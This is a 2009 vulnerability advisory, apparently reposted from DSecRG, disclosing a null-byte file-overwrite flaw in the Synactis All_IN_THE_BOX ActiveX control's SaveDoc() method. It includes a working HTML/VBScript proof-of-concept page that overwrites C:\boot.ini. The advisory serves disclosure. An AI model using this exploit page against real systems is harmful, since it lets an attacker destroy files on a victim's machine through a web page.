Synactis All_IN_THE_BOX ActiveX v3 Null byte File Overwrite Vuln

2009-01-30 17:35:10

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-006

http://www.dsecrg.com/pages/vul/show.php?id=62


Application: Synactis All_IN_THE_BOX ActiveX
Versions Affected: 3
Vendor URL: http://synactis.com
Bugs: Null byte File overwriting
Exploits: YES
Reported: 15.01.2009
Vendor response: NONE
Second Report: 22.01.2009
Vendor response: NONE
Date of Public Advisory: 30.01.2009
Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)


Description
***********
Synactis All_IN_THE_BOX ActiveX Control (ALL_IN_THE_BOX.OCX) can be used to owervrite any any file in target system.
Vulnerable method is "SaveDoc()"


Details
*******

By default when saving file All_IN_THE_BOX ActiveX control attend extension to filename variable in "SaveDoc()" method.
For example if you enter filename "boot.ini" in "SaveDoc()" method then control will create file boot.ini.box.
But by attending a null byte to filename attacker can owervrite any file in OS (see example for owervriting boot.ini)



Class AllBox
GUID: {B5576893-F948-4E0F-9BE1-A37CB56D66FF}
Number of Interfaces: 1
Default Interface: IAllBox
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False



Example:
*******

<html>
Test Exploit page
<object classid='clsid:B5576893-F948-4E0F-9BE1-A37CB56D66FF' id='sh2kerr' ></object>
<script language='vbscript'>

targetFile = "C:\PROGRA~1\Synactis\ALLIN-~1\ALL_IN~1.OCX"
prototype = "Sub SaveDoc ( ByVal aFileName As String )"
memberName = "SaveDoc"
progid = "All_In_The_Box.AllBox"
argCount = 1
arg1="C:\boot.ini"+unescape("%00")
sh2kerr.SaveDoc arg1
</script>
</html>



Fix Information
***************

No patches available.
We did not get any response from vendor for 2 weeks.




About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsecrg.com
http://www.dsec.ru

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.